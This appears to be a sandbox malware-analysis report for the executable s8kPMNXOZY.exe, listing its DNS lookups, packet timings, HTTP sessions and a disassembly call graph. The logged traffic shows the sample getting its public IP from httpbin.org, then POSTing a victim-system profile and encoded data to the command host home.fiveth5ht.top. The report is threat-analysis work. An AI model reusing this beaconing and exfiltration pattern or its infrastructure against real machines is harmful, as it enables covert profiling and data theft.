                                                        Dec 28, 2024 09:35:33.916416883 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916441917 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916515112 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916598082 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916606903 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916657925 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916708946 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916775942 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916791916 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916857958 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916910887 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916982889 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.916991949 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917041063 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917066097 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917136908 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917160988 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917222023 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917248011 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917331934 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917355061 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917438984 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917468071 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917577982 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917608976 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.917644978 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.978872061 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:33.978991032 CET804971581.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:34.581185102 CET4972180192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:34.700701952 CET804972181.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:34.701324940 CET4972180192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:34.701817989 CET4972180192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:34.821244001 CET804972181.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:36.012113094 CET804972181.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:36.012136936 CET804972181.29.149.125192.168.2.10
                                                        Dec 28, 2024 09:35:36.012192011 CET4972180192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:36.012541056 CET4972180192.168.2.1081.29.149.125
                                                        Dec 28, 2024 09:35:36.132050037 CET804972181.29.149.125192.168.2.10

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 28, 2024 09:35:27.319873095 CET6472653192.168.2.101.1.1.1
                                                        Dec 28, 2024 09:35:27.319941998 CET6472653192.168.2.101.1.1.1
                                                        Dec 28, 2024 09:35:27.460283041 CET53647261.1.1.1192.168.2.10
                                                        Dec 28, 2024 09:35:27.630944967 CET53647261.1.1.1192.168.2.10
                                                        Dec 28, 2024 09:35:32.224473953 CET6472953192.168.2.101.1.1.1
                                                        Dec 28, 2024 09:35:32.224543095 CET6472953192.168.2.101.1.1.1
                                                        Dec 28, 2024 09:35:32.366559029 CET53647291.1.1.1192.168.2.10
                                                        Dec 28, 2024 09:35:32.366573095 CET53647291.1.1.1192.168.2.10
                                                        Dec 28, 2024 09:35:34.440361023 CET6473153192.168.2.101.1.1.1
                                                        Dec 28, 2024 09:35:34.440414906 CET6473153192.168.2.101.1.1.1
                                                        Dec 28, 2024 09:35:34.579833984 CET53647311.1.1.1192.168.2.10
                                                        Dec 28, 2024 09:35:34.580034018 CET53647311.1.1.1192.168.2.10

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 28, 2024 09:35:27.319873095 CET192.168.2.101.1.1.10xac72Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                        Dec 28, 2024 09:35:27.319941998 CET192.168.2.101.1.1.10x8b6fStandard query (0)httpbin.org28IN (0x0001)false
                                                        Dec 28, 2024 09:35:32.224473953 CET192.168.2.101.1.1.10x2822Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                        Dec 28, 2024 09:35:32.224543095 CET192.168.2.101.1.1.10x200Standard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                        Dec 28, 2024 09:35:34.440361023 CET192.168.2.101.1.1.10xfdcfStandard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                        Dec 28, 2024 09:35:34.440414906 CET192.168.2.101.1.1.10xdb78Standard query (0)home.fiveth5ht.top28IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 28, 2024 09:35:27.630944967 CET1.1.1.1192.168.2.100xac72No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                        Dec 28, 2024 09:35:27.630944967 CET1.1.1.1192.168.2.100xac72No error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                        Dec 28, 2024 09:35:32.366573095 CET1.1.1.1192.168.2.100x2822No error (0)home.fiveth5ht.top81.29.149.125A (IP address)IN (0x0001)false
                                                        Dec 28, 2024 09:35:34.579833984 CET1.1.1.1192.168.2.100xfdcfNo error (0)home.fiveth5ht.top81.29.149.125A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • httpbin.org
                                                        • home.fiveth5ht.top

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.104971581.29.149.125808156C:\Users\user\Desktop\s8kPMNXOZY.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 28, 2024 09:35:32.489356995 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                        Host: home.fiveth5ht.top
                                                        Accept: */*
                                                        Content-Type: application/json
                                                        Content-Length: 461736
                                                        Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 31 37 33 39 36 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                        Data Ascii: { "ip": "8.46.123.189", "current_time": "8468739163627173968", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
                                                        Dec 28, 2024 09:35:32.609199047 CET4944OUTData Raw: 7a 66 42 30 73 68 34 71 79 65 70 67 38 42 57 78 4d 63 4a 54 78 45 70 63 51 35 48 6c 4e 4b 71 6e 69 5a 78 70 4f 46 43 70 56 71 77 63 6b 35 77 6a 46 38 78 2b 62 2b 4b 5c 2f 30 61 5c 2f 47 33 77 50 79 7a 4b 73 34 38 55 75 42 73 52 77 70 6c 75 64 34
                                                        Data Ascii: zfB0sh4qyepg8BWxMcJTxEpcQ5HlNKqniZxpOFCpVqwck5wjF8x+b+K\/0a\/G3wPyzKs48UuBsRwplud46pluV4qrnXDWaxxWNpYeWKqUFDIs5zSrSaw8ZVFOvTpU5JNRnKWh5\/RT2XHI6fyplf0CfhgUUUUGlPr8v1IXj5D+\/+f1\/z6NqxX70\/wDBLT9i79mn9o79n3xd43+M3w2\/4TLxNpXxg8QeE9P1H\/hL\/Hnh0
                                                        Dec 28, 2024 09:35:32.609241009 CET7416OUTData Raw: 41 34 36 38 50 38 32 7a 54 78 55 34 33 6a 6c 75 4c 77 75 54 30 35 5a 72 68 61 74 48 48 59 32 72 69 38 48 67 38 64 6d 65 64 34 62 4c 38 62 68 73 71 68 69 63 4c 68 36 38 48 6a 63 56 39 65 6c 55 6f 30 73 53 6f 30 70 2b 78 6e 65 53 35 47 34 5c 2f 36
                                                        Data Ascii: A468P82zTxU43jluLwuT05ZrhatHHY2ri8Hg8dmed4bL8bhsqhicLh68HjcV9elUo0sSo0p+xneS5G4\/6qeF3iPw\/l\/gl4eVM4wlbO6tDIMdCtl2Do4LG4\/BZTw5jczy7F5qsLi8Rh5rB4RZfCFaphpOrBVqdov2kFP9Fk+Bculaa58OeLNL1a3hJcW\/iCOPwjqRUqJJGaW6vL\/wANRwQg48+68SWksuNwtIyQg5N9N8I
                                                        Dec 28, 2024 09:35:32.609256983 CET2472OUTData Raw: 33 7a 36 55 65 31 38 35 66 31 38 7a 6f 50 33 6d 6b 73 34 5a 42 38 6b 32 78 5c 2f 2b 65 63 68 2b 76 34 5a 5c 2f 7a 78 56 47 54 54 35 66 37 68 32 38 34 34 48 66 33 4a 5c 2f 6f 54 56 6a 2b 50 5c 2f 67 58 39 61 73 72 49 5c 2f 38 41 41 5c 2f 38 41 6e
                                                        Data Ascii: 3z6Ue185f18zoP3mks4ZB8k2x\/+ech+v4Z\/zxVGTT5f7h2844Hf3J\/oTVj+P\/gX9asrI\/8AA\/8An3\/+vWJ\/kf7SpTtr96\/rT5H0p+yholh4q8R\/EP4d68jnR\/Hfw01rSboceZ5i3umpHJASVIntoLq8u4HRgY5oI3GCoZeg+Gth8e\/2R\/hP8a18R\/DXRPEmnaXqPh+fwzqFjqUNzo+qWGpP4ottf8Ta5Z2l9L
                                                        Dec 28, 2024 09:35:32.609358072 CET2472OUTData Raw: 47 6b 6b 61 53 4c 4c 61 79 77 7a 4b 77 53 57 52 4f 4a 41 43 72 73 47 42 42 72 39 75 76 2b 43 58 48 5c 2f 41 41 54 56 5c 2f 59 6f 5c 2f 61 4d 2b 41 48 6a 48 78 74 38 5a 66 67 74 5c 2f 77 6d 50 69 66 53 76 6a 46 34 67 38 4b 32 47 70 5c 2f 38 4c 47
                                                        Data Ascii: GkkaSLLaywzKwSWROJACrsGBBr9uv+CXH\/AATV\/Yo\/aM+AHjHxt8Zfgt\/wmPifSvjF4g8K2Gp\/8LG+LPh7yNBsvBPw91e1sPsXhXx3oeny+VqOuapcfaprSS9f7V5Ulw8EFvFD\/lN9OTwm4np8YU\/F6jjsiWQZrHIuEMNg518f\/bdDNKeV5vipYmeH\/s14BYP2GX1vZ145jPERrTpr6olerH+8vobSzjivNcVwZwjU
                                                        Dec 28, 2024 09:35:32.609448910 CET2472OUTData Raw: 6c 4d 5c 2f 75 4a 74 6a 35 36 39 76 4a 2b 6c 42 33 45 4d 6d 7a 35 48 2b 34 2b 66 2b 65 76 48 2b 52 32 37 66 68 54 50 6e 2b 2b 69 62 5c 2f 2b 6e 66 38 41 41 66 6d 66 36 63 55 34 66 63 6a 5c 2f 41 50 61 6e 5c 2f 48 78 5c 2f 6e 31 70 70 2b 38 37 38
                                                        Data Ascii: lM\/uJtj569vJ+lB3EMmz5H+4+f+evH+R27fhTPn++ib\/+nf8AAfmf6cU4fcj\/APan\/Hx\/n1pp+87874\/3Xmf5yeT9KA9r\/e\/D\/gEG3y23\/wDbKKP\/AD\/nv6VF5aR\/uXT\/APV3\/oP8KtSSffQfP3HmS\/uOP89\/6VA2zzPnSV\/3Q83\/AOvycf0Naez8\/wAP+CdAyTyf4E3+X\/n29P5+lQybG3v9zzJTi
                                                        Dec 28, 2024 09:35:32.609474897 CET2472OUTData Raw: 6e 38 76 38 41 50 4a 74 65 54 35 30 38 7a 66 7a 4a 5c 2f 72 54 2b 2b 39 37 53 30 46 50 58 4b 73 69 49 2b 39 5c 2f 39 62 35 6b 6b 76 2b 65 63 5a 71 49 74 7a 39 5c 2f 5a 43 5a 66 33 76 5c 2f 50 44 4f 66 38 41 50 54 38 76 54 54 32 66 6e 2b 48 5c 2f
                                                        Data Ascii: n8v8APJteT508zfzJ\/rT++97S0FPXKsiI+9\/9b5kkv+ecZqItz9\/ZCZf3v\/PDOf8APT8vTT2fn+H\/AAToP3dorE8Sa9Z+GND1LX9QOLLS7c3NwdwXEYdU+8QQOXHODXbfFPSNG+Fdx8RLSX4r\/Bv4h3vwa+Lfhz4IfGnSfhvrXxJfWPhP8QvF+neK9S8Lab4ptviX8JvhjZapp+uJ4G8V2lprvgXUvGOiRajo01le39q9
                                                        Dec 28, 2024 09:35:32.609493971 CET2472OUTData Raw: 64 78 46 70 46 7a 6f 6f 38 4b 65 4b 4e 4e 76 5c 2f 41 41 70 72 6c 6a 71 4e 6c 63 58 57 70 36 72 62 2b 4c 74 54 5c 2f 73 62 53 64 50 30 48 77 64 50 70 6e 69 50 54 5c 2f 48 48 69 4c 57 57 30 37 51 50 43 38 5c 2f 68 48 78 54 65 36 6a 71 53 61 4c 6f
                                                        Data Ascii: dxFpFzoo8KeKNNv\/AAprljqNlcXWp6rb+LtT\/sbSdP0HwdPpniPT\/HHiLWW07QPC8\/hHxTe6jqSaLo8+qn8vxPDP0WuJOL834+xWWcE1uJ+Mcpx2T5znOOws8tXEOE4QnHEYzHOeMpYTDYnMcip1p0KvEGDtmMcFCeDq4+rhsuhSwf6dg84+l9wNw1lfBuWY3j7L8h4OzPK83y7KsqxkMxlw\/X4zi6OWYGvRy\/EY3EYXL
                                                        Dec 28, 2024 09:35:32.728869915 CET2472OUTData Raw: 78 57 48 77 64 48 68 37 4b 50 61 59 76 4b 6f 35 35 68 36 31 58 68 72 4b 73 50 67 61 6d 54 31 4d 77 5c 2f 73 6d 6a 6d 53 7a 4c 45 5a 6a 53 79 36 4f 44 78 4f 5a 4f 6e 67 73 48 58 6c 69 6f 77 78 6d 49 72 34 57 6e 68 58 57 65 4b 77 33 74 66 36 41 66
                                                        Data Ascii: xWHwdHh7KPaYvKo55h61XhrKsPgamT1Mw\/smjmSzLEZjSy6ODxOZOngsHXliowxmIr4WnhXWeKw3tf6Af+H65\/6NZH\/h8P8A8UFflz+2z+1gf2xfiroHxOPgUfDhtD+H+leBBoQ8T\/8ACXC5TS\/EXinxANVOq\/8ACPeGTG1w\/iiS0Nj\/AGa4hWxSf7ZMbkw2\/wAc+Ib7wl4X8N+EtU1L4u\/B+88YeLPhh8LfjAvwj
                                                        Dec 28, 2024 09:35:32.728898048 CET2472OUTData Raw: 38 34 34 36 5c 2f 77 44 6b 31 5c 2f 6e 31 5c 2f 43 74 43 78 35 5a 2b 55 5c 2f 37 39 53 53 66 35 5c 2f 77 41 5c 2f 72 55 50 7a 2b 58 76 50 79 66 6c 31 5c 2f 77 43 6e 54 2b 56 50 5c 2f 77 42 59 42 38 6e 37 72 5c 2f 6c 6c 33 5c 2f 7a 77 66 7a 7a 55
                                                        Data Ascii: 8446\/wDk1\/n1\/CtCx5Z+U\/79SSf5\/wA\/rUPz+XvPyfl1\/wCnT+VP\/wBYB8n7r\/ll3\/zwfzzUK5+4f9JT\/rr+\/h\/Dn+Vc51878v6+Yyb7vyR\/P\/qpf+m3+evT0\/GFlTzHKfPH\/qvM\/wCW\/wDnr+lX2\/gf94\/ly\/uue\/69fyqs2yPGz7n+f8\/Xj3oNSmN\/l\/f7fvfMz6\/5\/wAimfJtdPuJ5XT
                                                        Dec 28, 2024 09:35:32.728945017 CET2472OUTData Raw: 55 39 41 30 33 55 5c 2f 70 32 53 4e 4a 55 61 4f 56 45 6b 6a 63 59 64 4a 46 44 6f 77 39 47 56 67 56 59 65 78 42 46 5a 6a 36 44 6f 63 6b 51 67 6b 30 58 53 5a 49 51 63 69 46 39 4f 73 32 69 42 79 54 6b 52 74 43 55 7a 6b 6b 35 78 6e 4a 4a 37 31 5c 2f
                                                        Data Ascii: U9A03U\/p2SNJUaOVEkjcYdJFDow9GVgVYexBFZj6DockQgk0XSZIQciF9Os2iByTkRtCUzkk5xnJJ71\/PnjD4C5d4uZ5wtn2Mz3HZTi+EsLjKOW08NTp1KE6+KzjIM5+s11K1VTp1OH6GGhPD1aFWOExmYUo1FLERqUf438BvpM5p4G5BxPw7hOGctz\/BcV46niMxlja1ejVjhXk+YZLicHS9nL2bp4jDZjVqP21OqqeJo4X
                                                        Dec 28, 2024 09:35:33.859076977 CET212INHTTP/1.0 503 Service Unavailable
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.104972181.29.149.125808156C:\Users\user\Desktop\s8kPMNXOZY.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 28, 2024 09:35:34.701817989 CET284OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                        Host: home.fiveth5ht.top
                                                        Accept: */*
                                                        Content-Type: application/json
                                                        Content-Length: 143
                                                        Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                        Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                        Dec 28, 2024 09:35:36.012113094 CET212INHTTP/1.0 503 Service Unavailable
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.104970434.226.108.1554438156C:\Users\user\Desktop\s8kPMNXOZY.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-28 08:35:29 UTC52OUTGET /ip HTTP/1.1
                                                        Host: httpbin.org
                                                        Accept: */*
                                                        2024-12-28 08:35:29 UTC224INHTTP/1.1 200 OK
                                                        Date: Sat, 28 Dec 2024 08:35:29 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 31
                                                        Connection: close
                                                        Server: gunicorn/19.9.0
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: true
                                                        2024-12-28 08:35:29 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                        Data Ascii: { "origin": "8.46.123.189"}


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:03:35:24
                                                        Start date:28/12/2024
                                                        Path:C:\Users\user\Desktop\s8kPMNXOZY.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\s8kPMNXOZY.exe"
                                                        Imagebase:0x240000
                                                        File size:4'500'992 bytes
                                                        MD5 hash:FBBA61C61FA706EEC44A022A1E9E3BAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:2.1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:20.8%
                                                          Total number of Nodes:313
                                                          Total number of Limit Nodes:50
                                                          execution_graph 69490 25d5e0 69491 25d652 WSAStartup 69490->69491 69492 25d5f0 69490->69492 69491->69492 69630 27b400 69631 27b425 69630->69631 69632 27b40b 69630->69632 69635 247770 69632->69635 69633 27b421 69636 2477b6 recv 69635->69636 69637 247790 69635->69637 69638 247799 69636->69638 69637->69636 69637->69638 69638->69633 69639 27e400 69640 27e412 69639->69640 69642 27e459 69639->69642 69643 2768b0 closesocket 69640->69643 69643->69642 69644 27b3c0 69645 27b3ee 69644->69645 69646 27b3cb 69644->69646 69650 279290 69646->69650 69657 2476a0 69646->69657 69647 27b3ea 69651 2476a0 send 69650->69651 69652 2792e5 69651->69652 69653 279335 WSAIoctl 69652->69653 69656 279392 69652->69656 69654 279366 69653->69654 69653->69656 69655 279371 setsockopt 69654->69655 69654->69656 69655->69656 69656->69647 69658 2476e6 send 69657->69658 69659 2476c0 69657->69659 69660 2476c9 69658->69660 69659->69658 69659->69660 69660->69647 69661 2413c9 69665 241160 69661->69665 69664 2413a1 69665->69664 69666 5c93e0 69665->69666 69676 5c8a20 10 API calls 69665->69676 69667 5c9400 69666->69667 69675 5c93f3 69666->69675 69668 5c96c7 69667->69668 69671 5c9688 69667->69671 69673 5c9280 vfprintf 69667->69673 69674 5c9220 vfprintf 69667->69674 69667->69675 69678 5c9220 vfprintf 69668->69678 69671->69668 69671->69675 69677 5c9280 vfprintf 69671->69677 69672 5c96df 69672->69665 69673->69667 69674->69667 69675->69665 69676->69665 69677->69671 69678->69672 69493 2f4720 69497 2f4728 69493->69497 69494 2f4733 69496 2f4774 69497->69494 69504 2f476c 69497->69504 69505 2f5540 closesocket 69497->69505 69499 2f482e 69499->69504 69506 2f9270 69499->69506 69501 2f4860 69511 2f4950 69501->69511 69503 2f4878 69504->69503 69519 2f30a0 closesocket 69504->69519 69505->69499 69520 2fa440 69506->69520 69508 2f9297 69509 2f92ab 69508->69509 69559 2fbbe0 closesocket 69508->69559 69509->69501 69512 2f4966 69511->69512 69513 2f49c5 69512->69513 69515 2f49b9 69512->69515 69561 2fb590 if_nametoindex if_indextoname 69512->69561 69513->69504 69515->69513 69516 2f4aa0 gethostname 69515->69516 69516->69513 69516->69515 69517 2f4a3e 69517->69513 69562 2fbbe0 closesocket 69517->69562 69519->69496 69521 2fa46b 69520->69521 69522 2fa4db 69521->69522 69523 2fa48b GetAdaptersAddresses 69521->69523 69524 2faa03 RegOpenKeyExA 69522->69524 69538 2fad14 69522->69538 69541 2fa4a6 69523->69541 69556 2fa53f 69523->69556 69525 2faa27 RegQueryValueExA 69524->69525 69526 2fab70 RegOpenKeyExA 69524->69526 69528 2faacc RegQueryValueExA 69525->69528 69529 2faa71 69525->69529 69527 2fac34 RegOpenKeyExA 69526->69527 69552 2fab90 69526->69552 69530 2facf8 RegOpenKeyExA 69527->69530 69555 2fac54 69527->69555 69531 2fab0e 69528->69531 69532 2fab66 RegCloseKey 69528->69532 69529->69528 69535 2faa85 RegQueryValueExA 69529->69535 69533 2fad56 RegEnumKeyExA 69530->69533 69530->69538 69531->69532 69542 2fab1e RegQueryValueExA 69531->69542 69532->69526 69536 2fad9b 69533->69536 69533->69538 69534 2fa4f3 GetAdaptersAddresses 69537 2fa505 69534->69537 69534->69556 69540 2faab3 69535->69540 69539 2fae16 RegOpenKeyExA 69536->69539 69543 2fa527 GetAdaptersAddresses 69537->69543 69557 2fa520 69537->69557 69538->69508 69544 2faddf RegEnumKeyExA 69539->69544 69545 2fae34 RegQueryValueExA 69539->69545 69540->69528 69541->69534 69541->69557 69549 2fab4c 69542->69549 69543->69556 69543->69557 69544->69538 69544->69539 69547 2faf43 RegQueryValueExA 69545->69547 69558 2fadaa 69545->69558 69548 2fb052 RegQueryValueExA 69547->69548 69547->69558 69551 2fadc7 RegCloseKey 69548->69551 69548->69558 69549->69532 69550 2fa794 GetBestRoute2 69550->69556 69551->69544 69552->69527 69553 2fafa0 RegQueryValueExA 69553->69558 69554 2fa6c7 GetBestRoute2 69554->69556 69555->69530 69556->69550 69556->69554 69556->69557 69557->69522 69560 2fb830 if_nametoindex if_indextoname 69557->69560 69558->69547 69558->69548 69558->69551 69558->69553 69559->69509 69560->69522 69561->69517 69562->69515 69679 2f3c00 69680 2f3c23 69679->69680 69682 2f3c0d 69679->69682 69680->69682 69683 30b180 69680->69683 69684 30b19b 69683->69684 69685 30b2e3 69683->69685 69684->69685 69688 30b2a9 getsockname 69684->69688 69690 30b020 closesocket 69684->69690 69691 30af30 69684->69691 69695 30b060 69684->69695 69685->69682 69700 30b020 69688->69700 69690->69684 69692 30af63 socket 69691->69692 69693 30af4c 69691->69693 69692->69684 69693->69692 69694 30af52 69693->69694 69694->69684 69699 30b080 69695->69699 69696 30b0b0 connect 69697 30b0bf WSAGetLastError 69696->69697 69698 30b0ea 69697->69698 69697->69699 69698->69684 69699->69696 69699->69697 69699->69698 69701 30b052 69700->69701 69702 30b029 69700->69702 69701->69684 69703 30b04b closesocket 69702->69703 69704 30b03e 69702->69704 69703->69701 69704->69684 69705 30a080 69708 309740 69705->69708 69707 30a09b 69709 309780 69708->69709 69713 30975d 69708->69713 69710 309925 RegOpenKeyExA 69709->69710 69709->69713 69711 30995a RegQueryValueExA 69710->69711 69710->69713 69712 309986 RegCloseKey 69711->69712 69712->69713 69713->69707 69714 242f17 69721 242f2c 69714->69721 69715 2431d3 69716 242fb3 RegOpenKeyExA 69716->69721 69717 24315c RegEnumKeyExA 69717->69721 69718 243046 RegOpenKeyExA 69719 243089 RegQueryValueExA 69718->69719 69718->69721 69720 24313b RegCloseKey 69719->69720 69719->69721 69720->69721 69721->69715 69721->69716 69721->69717 69721->69718 69721->69720 69722 2431d7 69723 2431f4 69722->69723 69724 243200 69723->69724 69728 243223 69723->69728 69729 2415b0 _lock 69724->69729 69726 24321e 69727 2432dc CloseHandle 69727->69726 69728->69727 69729->69726 69563 2795b0 69564 2795c8 69563->69564 69566 2795fd 69563->69566 69564->69566 69567 27a150 69564->69567 69568 27a15f 69567->69568 69570 27a1d0 69567->69570 69569 27a181 getsockname 69568->69569 69568->69570 69569->69570 69570->69566 69730 278b50 69731 278b6b 69730->69731 69749 278bb5 69730->69749 69732 278bf3 69731->69732 69733 278b8f 69731->69733 69731->69749 69750 27a550 69732->69750 69765 256e40 select 69733->69765 69736 